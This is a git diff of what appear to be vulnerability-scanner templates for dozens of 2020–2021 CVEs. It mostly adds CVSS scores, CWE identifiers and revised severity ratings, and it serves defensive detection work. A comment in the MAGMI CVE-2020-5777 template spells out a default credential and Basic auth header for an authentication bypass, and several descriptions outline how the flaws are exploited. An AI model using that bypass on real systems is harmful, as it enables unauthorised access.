cvss-score: 6.50 + cve-id: CVE-2020-5412 + cwe-id: CWE-610 requests: - method: GET diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml index 513a3be8c5..23edf290ed 100644 --- a/cves/2020/CVE-2020-5776.yaml +++ b/cves/2020/CVE-2020-5776.yaml @@ -11,6 +11,11 @@ info: # Due to the lack of CSRF tokens, RCE (via phpcli command) is possible # in the event that a CSRF is leveraged against an existing admin session for MAGMI. # At the time of this advisory, no patch exists for this issue. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-5776 + cwe-id: CWE-352 requests: - raw: diff --git a/cves/2020/CVE-2020-5777.yaml b/cves/2020/CVE-2020-5777.yaml index 6dbfb02778..ad90884501 100644 --- a/cves/2020/CVE-2020-5777.yaml +++ b/cves/2020/CVE-2020-5777.yaml @@ -3,7 +3,7 @@ id: CVE-2020-5777 info: name: Remote Auth Bypass in MAGMI (Magento Mass Importer) Plugin <= v0.7.23 author: dwisiswant0 - severity: high + severity: critical description: MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure. reference: https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35 tags: cve,cve2020,magmi,magento @@ -12,6 +12,11 @@ info: # While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php # with default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=) # Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5777 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2020/CVE-2020-5847.yaml b/cves/2020/CVE-2020-5847.yaml index 08d43a9cd4..176b2b2136 100644 --- a/cves/2020/CVE-2020-5847.yaml +++ b/cves/2020/CVE-2020-5847.yaml @@ -2,10 +2,15 @@ id: CVE-2020-5847 info: name: UnRaid Remote Code Execution author: madrobot - severity: high + severity: critical description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbitrary code. reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5847 + cwe-id: CWE-94,CWE-668 requests: - method: GET diff --git a/cves/2020/CVE-2020-5902.yaml b/cves/2020/CVE-2020-5902.yaml index e55a8ef228..c8698e5e5f 100644 --- a/cves/2020/CVE-2020-5902.yaml +++ b/cves/2020/CVE-2020-5902.yaml @@ -3,7 +3,7 @@ id: CVE-2020-5902 info: name: F5 BIG-IP TMUI RCE author: madrobot,dwisiswant0,ringo - severity: high + severity: critical description: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. reference: - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html @@ -18,6 +18,11 @@ info: - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ - https://www.kb.cert.org/vuls/id/290915 tags: cve,cve2020,bigip,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5902 + cwe-id: CWE-22,CWE-829 requests: - method: GET diff --git a/cves/2020/CVE-2020-6207.yaml b/cves/2020/CVE-2020-6207.yaml index d36d906517..aa4f6887c5 100644 --- a/cves/2020/CVE-2020-6207.yaml +++ b/cves/2020/CVE-2020-6207.yaml @@ -14,6 +14,11 @@ info: - https://github.com/chipik/SAP_EEM_CVE-2020-6207 - https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/ - https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-6207 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml index 46077c6fbd..d86e3db289 100644 --- a/cves/2020/CVE-2020-6287.yaml +++ b/cves/2020/CVE-2020-6287.yaml @@ -12,6 +12,11 @@ info: - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 - https://www.onapsis.com/recon-sap-cyber-security-vulnerability - https://github.com/chipik/SAP_RECON + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-6287 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml index a0bb988cd8..7ff8dd8f94 100644 --- a/cves/2020/CVE-2020-6308.yaml +++ b/cves/2020/CVE-2020-6308.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://github.com/InitRoot/CVE-2020-6308-PoC tags: cve,cve2020,sap,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-6308 + cwe-id: CWE-918 + description: "SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability." requests: - method: POST diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml index 4c27c186ac..572f55b729 100644 --- a/cves/2020/CVE-2020-6637.yaml +++ b/cves/2020/CVE-2020-6637.yaml @@ -3,12 +3,17 @@ id: CVE-2020-6637 info: name: OpenSIS v7.3 unauthenticated SQL injection author: pikpikcu - severity: high + severity: critical description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php. tags: cve,cve2020,sqli,opensis reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-6637 - https://cinzinga.com/CVE-2020-6637/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-6637 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index d08e8d811a..ddd44f6016 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml @@ -12,6 +12,10 @@ info: - https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - https://www.hpe.com/us/en/home.html # vendor homepage + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7209 requests: - method: GET diff --git a/cves/2020/CVE-2020-7247.yaml b/cves/2020/CVE-2020-7247.yaml index f040fb2e36..f570b6ab86 100644 --- a/cves/2020/CVE-2020-7247.yaml +++ b/cves/2020/CVE-2020-7247.yaml @@ -5,6 +5,12 @@ info: severity: critical reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 tags: cve,cve2020,smtp,opensmtpd,network,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7247 + cwe-id: CWE-78,CWE-755 + description: "smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation." network: - inputs: diff --git a/cves/2020/CVE-2020-7318.yaml b/cves/2020/CVE-2020-7318.yaml index 0d6ceac8da..7f5f53afc6 100644 --- a/cves/2020/CVE-2020-7318.yaml +++ b/cves/2020/CVE-2020-7318.yaml @@ -13,6 +13,11 @@ info: reference: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ tags: cve,cve2020,xss + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.30 + cve-id: CVE-2020-7318 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 1ca340cabb..3c7e70486f 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -8,6 +8,11 @@ info: reference: - https://www.adminxe.com/2183.html tags: cve,cve2020,zimbra,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7796 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index 9f314f0f40..dd62e8fa68 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -10,6 +10,11 @@ info: - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7961 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2020/CVE-2020-8091.yaml b/cves/2020/CVE-2020-8091.yaml index 0e62f1aae1..96ccd5bd0a 100644 --- a/cves/2020/CVE-2020-8091.yaml +++ b/cves/2020/CVE-2020-8091.yaml @@ -9,6 +9,11 @@ info: reference: - https://typo3.org/security/advisory/typo3-psa-2019-003/ - https://www.purplemet.com/blog/typo3-xss-vulnerability + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8091 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-8115.yaml b/cves/2020/CVE-2020-8115.yaml index f12449e30e..f38b0a3567 100644 --- a/cves/2020/CVE-2020-8115.yaml +++ b/cves/2020/CVE-2020-8115.yaml @@ -10,6 +10,11 @@ info: - https://hackerone.com/reports/775693 - https://www.revive-adserver.com/security/revive-sa-2020-001/ tags: cve,cve2020,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8115 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-8163.yaml b/cves/2020/CVE-2020-8163.yaml index 396f4c1b06..b638675ca1 100644 --- a/cves/2020/CVE-2020-8163.yaml +++ b/cves/2020/CVE-2020-8163.yaml @@ -7,6 +7,11 @@ info: description: Tests for ability to pass user parameters as local variables into partials reference: https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/ tags: cve,cve2020,rails,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-8163 + cwe-id: CWE-94 requests: - method: GET diff --git a/cves/2020/CVE-2020-8191.yaml b/cves/2020/CVE-2020-8191.yaml index 653c89b7d0..850e1e43ea 100644 --- a/cves/2020/CVE-2020-8191.yaml +++ b/cves/2020/CVE-2020-8191.yaml @@ -3,11 +3,16 @@ id: CVE-2020-8191 info: name: Citrix ADC & NetScaler Gateway Reflected XSS author: dwisiswant0 - severity: high + severity: medium tags: cve,cve2020,citrix,xss reference: https://support.citrix.com/article/CTX276688 description: | Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS). + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8191 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2020/CVE-2020-8193.yaml b/cves/2020/CVE-2020-8193.yaml index b63ac93a82..286402bddc 100644 --- a/cves/2020/CVE-2020-8193.yaml +++ b/cves/2020/CVE-2020-8193.yaml @@ -3,12 +3,17 @@ id: CVE-2020-8193 info: name: Citrix unauthenticated LFI author: pdteam - severity: high + severity: medium reference: - https://github.com/jas502n/CVE-2020-8193 - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints. tags: cve,cve2020,citrix,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.50 + cve-id: CVE-2020-8193 + cwe-id: CWE-862 requests: - raw: diff --git a/cves/2020/CVE-2020-8194.yaml b/cves/2020/CVE-2020-8194.yaml index 1c08f85a0f..70af4732d1 100644 --- a/cves/2020/CVE-2020-8194.yaml +++ b/cves/2020/CVE-2020-8194.yaml @@ -3,10 +3,15 @@ id: CVE-2020-8194 info: name: Citrix ADC & NetScaler Gateway Reflected Code Injection author: dwisiswant0 - severity: high + severity: medium tags: cve,cve2020,citrix description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download. reference: https://support.citrix.com/article/CTX276688 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2020-8194 + cwe-id: CWE-94 requests: - raw: diff --git a/cves/2020/CVE-2020-8209.yaml b/cves/2020/CVE-2020-8209.yaml index 6b7489c55f..6b809abb63 100644 --- a/cves/2020/CVE-2020-8209.yaml +++ b/cves/2020/CVE-2020-8209.yaml @@ -12,6 +12,11 @@ info: reference: - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/ tags: cve,cve2020,citrix,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-8209 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-8512.yaml b/cves/2020/CVE-2020-8512.yaml index d63d614467..8db1c6dddd 100644 --- a/cves/2020/CVE-2020-8512.yaml +++ b/cves/2020/CVE-2020-8512.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/47988 - https://twitter.com/sagaryadav8742/status/1275170967527006208 tags: cve,cve2020,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8512 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-8515.yaml b/cves/2020/CVE-2020-8515.yaml index da3aec26dd..05ec699777 100644 --- a/cves/2020/CVE-2020-8515.yaml +++ b/cves/2020/CVE-2020-8515.yaml @@ -9,6 +9,11 @@ info: - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8515 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-8771.yaml b/cves/2020/CVE-2020-8771.yaml index 5cf989eb97..6a244c4df1 100644 --- a/cves/2020/CVE-2020-8771.yaml +++ b/cves/2020/CVE-2020-8771.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://github.com/SECFORCE/WPTimeCapsulePOC tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8771 + cwe-id: CWE-287 + description: "The Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts." requests: - raw: diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 0a036e89a5..988906da9e 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -3,11 +3,16 @@ id: CVE-2020-8813 info: name: Cacti v1.2.8 - Unauthenticated Remote Code Execution author: gy741 - severity: critical + severity: high description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability reference: - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ tags: cve,cve2020,cacti,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-8813 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-8982.yaml b/cves/2020/CVE-2020-8982.yaml index 74819b7066..34b82f700e 100644 --- a/cves/2020/CVE-2020-8982.yaml +++ b/cves/2020/CVE-2020-8982.yaml @@ -7,6 +7,11 @@ info: description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020. tags: cve,cve2020,citrix,lfi reference: https://support.citrix.com/article/CTX269106 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-8982 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml index 1f7d2d46bb..e19606cf3b 100644 --- a/cves/2020/CVE-2020-9036.yaml +++ b/cves/2020/CVE-2020-9036.yaml @@ -8,6 +8,12 @@ info: - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-9036 tags: cve,cve2020,xss,jeedom + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9036 + cwe-id: CWE-79 + description: "Jeedom through 4.0.38 allows XSS." requests: - method: GET diff --git a/cves/2020/CVE-2020-9047.yaml b/cves/2020/CVE-2020-9047.yaml index b7e04c9990..29d78f3858 100644 --- a/cves/2020/CVE-2020-9047.yaml +++ b/cves/2020/CVE-2020-9047.yaml @@ -21,6 +21,11 @@ info: - https://www.johnsoncontrols.com/cyber-solutions/security-advisories - https://www.us-cert.gov/ics/advisories/ICSA-20-170-01 tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2020-9047 + cwe-id: CWE-347 requests: - method: GET diff --git a/cves/2020/CVE-2020-9054.yaml b/cves/2020/CVE-2020-9054.yaml index ff2a299a2b..e7fb124544 100644 --- a/cves/2020/CVE-2020-9054.yaml +++ b/cves/2020/CVE-2020-9054.yaml @@ -19,6 +19,11 @@ info: - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/ - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-9054 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2020/CVE-2020-9315.yaml b/cves/2020/CVE-2020-9315.yaml index f244463bf9..14eed4ccd2 100644 --- a/cves/2020/CVE-2020-9315.yaml +++ b/cves/2020/CVE-2020-9315.yaml @@ -6,6 +6,12 @@ info: severity: high reference: https://www.cvebase.com/cve/2020/9315 tags: cve,cve2020,oracle + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9315 + cwe-id: CWE-306 + description: "** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x has Incorrect Access Control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE." requests: - method: GET diff --git a/cves/2020/CVE-2020-9344.yaml b/cves/2020/CVE-2020-9344.yaml index c36d080c80..760e443f9a 100644 --- a/cves/2020/CVE-2020-9344.yaml +++ b/cves/2020/CVE-2020-9344.yaml @@ -10,6 +10,11 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344 - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9344 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-9376.yaml b/cves/2020/CVE-2020-9376.yaml index 66b1211b6b..a8e7f8c014 100644 --- a/cves/2020/CVE-2020-9376.yaml +++ b/cves/2020/CVE-2020-9376.yaml @@ -13,6 +13,11 @@ info: - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182 - https://www.dlink.com.br/produto/dir-610/ tags: cve,cve2020,dlink + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9376 + cwe-id: CWE-74 requests: - method: POST path: diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml index c9f38d9a42..172130f2c4 100644 --- a/cves/2020/CVE-2020-9402.yaml +++ b/cves/2020/CVE-2020-9402.yaml @@ -10,6 +10,11 @@ info: author: geeknik severity: high tags: cve,cve2020,django,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-9402 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2020/CVE-2020-9425.yaml b/cves/2020/CVE-2020-9425.yaml index 2336c16344..239b63a125 100644 --- a/cves/2020/CVE-2020-9425.yaml +++ b/cves/2020/CVE-2020-9425.yaml @@ -8,6 +8,11 @@ info: - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153 - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9 tags: cve,cve2020,rconfig + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9425 + cwe-id: CWE-670 requests: - method: GET diff --git a/cves/2020/CVE-2020-9483.yaml b/cves/2020/CVE-2020-9483.yaml index e0017d5eda..ef8f233909 100644 --- a/cves/2020/CVE-2020-9483.yaml +++ b/cves/2020/CVE-2020-9483.yaml @@ -8,6 +8,11 @@ info: When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters. reference: https://github.com/apache/skywalking/pull/4639 tags: cve,cve2020,sqli,skywalking + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9483 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-9484.yaml b/cves/2020/CVE-2020-9484.yaml index 4765190c8e..95f1a4eec0 100644 --- a/cves/2020/CVE-2020-9484.yaml +++ b/cves/2020/CVE-2020-9484.yaml @@ -14,6 +14,11 @@ info: tags: cve,cve2020,apache reference: - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.00 + cve-id: CVE-2020-9484 + cwe-id: CWE-502 requests: - method: GET diff --git a/cves/2020/CVE-2020-9490.yaml b/cves/2020/CVE-2020-9490.yaml index cd341cf256..583cee2db1 100644 --- a/cves/2020/CVE-2020-9490.yaml +++ b/cves/2020/CVE-2020-9490.yaml @@ -2,7 +2,7 @@ id: CVE-2020-9490 info: name: CVE-2020-9490 - severity: medium + severity: high description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers. author: philippedelteil tags: cve,cve2020,apache,dos @@ -11,6 +11,11 @@ info: - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030 - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369 - https://nvd.nist.gov/vuln/detail/CVE-2020-9490 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2020-9490 + cwe-id: CWE-444 requests: - method: GET diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml index d8143b9e67..062a835761 100644 --- a/cves/2020/CVE-2020-9496.yaml +++ b/cves/2020/CVE-2020-9496.yaml @@ -10,6 +10,11 @@ info: - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9496 + cwe-id: CWE-79,CWE-502 requests: - raw: diff --git a/cves/2020/CVE-2020-9757.yaml b/cves/2020/CVE-2020-9757.yaml index c9ef094170..fac0befccd 100644 --- a/cves/2020/CVE-2020-9757.yaml +++ b/cves/2020/CVE-2020-9757.yaml @@ -6,6 +6,16 @@ info: severity: high description: The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller. tags: cve,cve2020,ssti + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9757 + cwe-id: CWE-74 + reference: + - https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md + - https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt + - https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b + - https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f requests: - method: GET diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index 35aef60dbd..0074e7885d 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -15,6 +15,11 @@ info: - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md tags: cve,cve2021,cisco,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-1497 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-20090.yaml 